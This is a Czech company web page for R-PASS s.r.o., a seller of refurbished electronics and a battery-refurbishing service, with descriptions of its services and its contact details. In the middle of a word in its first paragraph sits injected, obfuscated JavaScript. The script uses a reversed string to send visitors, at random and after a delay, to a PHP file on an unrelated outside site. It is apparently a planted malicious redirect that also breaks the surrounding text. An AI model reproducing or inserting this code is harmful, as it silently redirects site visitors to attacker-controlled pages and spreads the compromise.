Rainbow page separator

R-PASS S.R.O. – REPASOVANÁ ELEKTRONIKA A PŘÍSLUŠENSTVÍ, PRODEJ A REPAS BATERIÍ

Jsme expertem na prodej a servis repasované a předváděcí elektroniky. Všechny produkty jsou tes[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tované a 100% funkční. U nás zakoupíte pouze kvalitu. Produkty si můžete prohlédnout na e-shopu www.r-pass.cz. Pokud chcete své zařízení opravit, rádi Vám s tím pomůžeme.

Nově nabízíme repasování baterií

Zrepasujeme Vám baterii, kterou k nám dopravíte – baterie do elektrokol, ručního a zahradního nářadí, čtyřkolek, invalidních vozíků, hraček apod. Repasování baterie probíhá výměnou všech článků za nové z důvodu spolehlivosti. Používáme články nejvyšší kvality, abychom docílili dlouhé životnosti.

Repasovaná elektronika
Provádíme repas elektroniky jako jsou notebooky, počítače, tablety či telefony. V nabídce najdete také nové a předváděcí produkty.

Co je repasované zařízení:
Po době využitelnosti firemními zákazníky je zboží repasováno pro další použití, tzn. projde procesy jako je test, diagnostika, repas chlazení, instalace nového operačního systému apod.

Co je předváděcí zařízení:
Zařízení bylo vystaveno v showroomu výrobce nebo pochází z nadlimitní výroby. Téměř všechny předváděcí produkty jsou ve stavu nového zařízení, tedy bez opotřebení a škrábanců.

Prodej baterií
Specializujeme se na širokou škálu prodeje baterií do různých zařízení. Poskytneme vám odborné poradenství při výběru.

 

Nabízíme pozáruční servis notebooků všech typů, značek a jakýchkoliv závad. V rámci servisu notebooků provádíme hardwarové i softwarové opravy notebooků. Díky mnohaletým zkušenostem našich kolegů – techniků vám garantujeme, že vaše zařízení bude v nejlepších rukou.

Myslíme ekologicky
U nás v R-PASS.cz smýšlíme ekologicky. Samozřejmostí je pro nás třídění odpadu, recyklace poškozených i nefunkční dílů a baterií i používání repasované výpočetní techniky. Naším cílem je produkovat co nejméně elektroodpadu.

 


Pozáruční servis
 Adresa firmy/příjem a výdej repase:
Vejmluvova 377/1
591 02 Žďár nad Sázavou

Telefon: +420 604 354 353 (PO-PÁ 10.00-15.00)

Na Vaše obecné dotazy rádi odpovíme na: info@r-pass.cz
Na dotazy a cenové nabídky ohledně repasování na: repas@r-pass.cz

E-shop: http://www.r-pass.cz
Facebook: https://www.facebook.com/RPASS.CZ
Instagram: https://www.instagram.com/r_passcz/